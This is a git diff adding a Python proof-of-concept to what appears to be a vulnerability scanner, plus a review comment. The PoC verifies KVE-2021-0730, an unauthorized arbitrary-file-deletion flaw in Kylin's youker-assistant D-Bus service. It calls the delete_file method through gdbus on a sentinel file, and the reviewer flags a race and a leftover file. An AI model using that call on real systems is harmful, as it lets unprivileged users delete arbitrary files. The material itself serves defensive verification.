diff --git a/pocs/kp_2022_0016_unauthorized_access_assistant_systemdaemon_delete_file.py b/pocs/kp_2022_0016_unauthorized_access_assistant_systemdaemon_delete_file.py
new file mode 100644
index 0000000000000000000000000000000000000000..199c8229b6d52929b9c9413f9657253d472d760e
--- /dev/null
+++ b/pocs/kp_2022_0016_unauthorized_access_assistant_systemdaemon_delete_file.py
@@ -0,0 +1,84 @@
+import subprocess
+from utils import highlight,tree,error
+from lib.core.basic import BasePoc
+import os
+import sqlite3
+import dbus
+import pwd
+import re
+import time
+
+
+POC_NAME = 'unauthorized_access_com_kylin_assistant_systemdaemon_delete_file'
+
+class unauthorized_access_com_kylin_assistant_systemdaemon_delete_file(BasePoc):
+ poc_info = {
+ # 尽量添加以下内容
+ 'poc': {
+ 'Id': 'kp_2022_0016', # poc编号,命名规范为kp_2022_0001_*.py
+ 'kve': "KVE-2021-0730 ", # kve id
+ 'ZenTaoID': "67415", # 禅道ID
+ 'Name': r' youker-assistant存在未授权漏洞_删除文件', # poc名称
+ 'Author': 'luojunyou', # poc作者
+ 'Create_date': '2022-04-13', # poc创建时间:如'2014-11-19'
+ },
+ 'vul': {
+ 'Product': 'youker-assistant', # 漏洞所在产品名称
+ 'Version': r'低于低于3.0.2-0kylin6k64~rc2', # 产品的版本号
+ 'Type': r'任意文件删除', # 漏洞类型
+ 'Severity': 'High', # Bug severity
+ 'Description': r'youker-assistant是UKUI桌面环境的麒麟助手。安全应急响应团队发现麒麟助手的D-Bus服务总线com.kylin.assistant.systemdaemon:: delete_file接口存在未授权删除任意文件漏洞。 ', # 漏洞介绍
+ 'DisclosureDate': '2021-07-16', # poc公布时间:如'2014-11-19'
+ 'ZenTaoURL':'暂不公布', #禅道链接
+ 'RepairSolution':r'目前此漏洞已经完成修复,可直接使用命令apt upgrade youker-assistant完成更新。', #修复方案
+ }
+ }
+
+ scan_info = {
+ 'Target': '',
+ 'TaskId': '',
+ 'Mode': 'verify', # verify或exploit, 默认值为verify
+ 'Verbose': False, # 是否打印详细信息,默认值为False
+ 'Error': '', # 记录poc失败信息
+ 'Success': False, # 是否执行成功,默认值为False表示poc执行不成功,若成功请更新该值为True
+ 'Ret': tree() # 记录额外的poc相关信息
+ }
+
+ test_case = {
+ 'Need_fb': False,
+ 'Vuln': [], # 列表格式的测试版本
+ 'Not_vuln': [], # 同上
+ }
+
+
+ def verify(self, first=False):
+ # 漏洞验证方法(mode=verify)
+ target = self.scan_info.get("Target", "") # 获取测试目标
+ verbose = self.scan_info.get("Verbose", False) # 是否打印详细信息
+ flag_str = '' #漏洞成立时的特征字符串
+ flag_list = [] #漏洞成立时的特征列表
+ # 以下是PoC的检测逻辑
+ print('testing if {} vulnerability'.format(self.poc_info["poc"]["Name"]))
+ FileName = self.get_random_str(8)
+ flag_str = self.get_random_str(20)
+ try:
+ self.exec_command_by_root(self,"touch /{}".format(flag_str))
+ time.sleep(2)
+ cmd = "gdbus call --system --dest com.kylin.assistant.systemdaemon --object-path /com/kylin/assistant/systemdaemon --method com.kylin.assistant.systemdaemon.delete_file /{}".format(flag_str)
+ os.popen(cmd)
+ if os.path.isfile("/{}".format(flag_str)) == False :
+ msg = r'本机 ( {} ) 存在 {} (禅道ID : {} ) 。 漏洞描述 : {} '.format(self.scan_info['Target'],self.poc_info["poc"]["Name"],self.poc_info["poc"]["ZenTaoID"],self.poc_info["vul"]["Description"])
+ print(msg)
+ self.scan_info['Success'] = True # 漏洞存在,必须将该字段更新为True(必须)
+ self.scan_info['Ret']['VerifyInfo']['Target'] = 'localhost' # 记录漏洞相关的一些额外信息(可选)
+ self.scan_info['Ret']['VerifyInfo']['DATA'] = msg
+ if verbose:
+ highlight('[*] {} vul found'.format(self.poc_info["poc"]["Name"]))
+ except Exception as e:
+ #print(e)
+ error('[*] {} vul running error : {}'.format(self.poc_info["poc"]["Name"],str(e)))
+
+
+ def exploit(self, first=False):
+ # 漏洞利用方法(mode=verify)
+ self.verify(first=first)
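Review bot: `os.popen(cmd)` in verify launches the gdbus call without waiting for it (the returned handle is never read or closed), so the `os.path.isfile` check on the next line can run before the D-Bus method has been processed and report a vulnerable host as clean. `subprocess` is already imported; running the command as an argument list with `subprocess.run(cmd, timeout=30)` blocks until the call returns and avoids a shell entirely. The sentinel `/<flag_str>` created by `exec_command_by_root` is never removed when the host is not vulnerable, so the probe leaves a root-owned file in `/` on every patched system; a `finally` that removes it through the same helper fixes that (the explicit `self` passed as that helper's first argument also looks like a doubled receiver — worth confirming against BasePoc). Minor: `target`, `flag_list` and `FileName` are assigned but unused, as are the `sqlite3`, `dbus`, `pwd` and `re` imports; `== False` should be `not ...`; and the comment on `exploit` says `mode=verify` where `mode=exploit` is meant.
```python
            time.sleep(2)
            cmd = ["gdbus", "call", "--system",
                   "--dest", "com.kylin.assistant.systemdaemon",
                   "--object-path", "/com/kylin/assistant/systemdaemon",
                   "--method", "com.kylin.assistant.systemdaemon.delete_file",
                   "/{}".format(flag_str)]
            subprocess.run(cmd, timeout=30)  # wait for the call to finish before checking the file
            if not os.path.isfile("/{}".format(flag_str)):
                # … unchanged: result reporting …
        except Exception as e:
            # … unchanged: error logging …
        finally:
            # Not vulnerable (or call failed): do not leave the sentinel behind.
            if os.path.isfile("/{}".format(flag_str)):
                self.exec_command_by_root(self, "rm -f /{}".format(flag_str))
```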